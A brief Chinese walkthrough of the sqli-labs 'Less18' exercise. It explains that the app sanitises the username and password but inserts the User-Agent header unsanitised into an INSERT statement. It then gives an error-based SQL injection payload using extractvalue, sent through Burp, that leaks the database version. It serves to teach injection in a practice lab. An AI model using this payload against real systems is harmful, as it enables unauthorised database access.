Less18
本关可以从源码了解到对uname和passwd进行了check_input()函数的处理,所以这里无法注入了。
1 | $uname = check_input($_POST['uname']); |
但是代码中将useragent和ip插入到数据库中,可以使用useragent进行注入
1 | INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname) |
使用burp抓包修改useragent看看
修改useragent报错注入
1 | ' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1 |
可以看到已经得到版本号了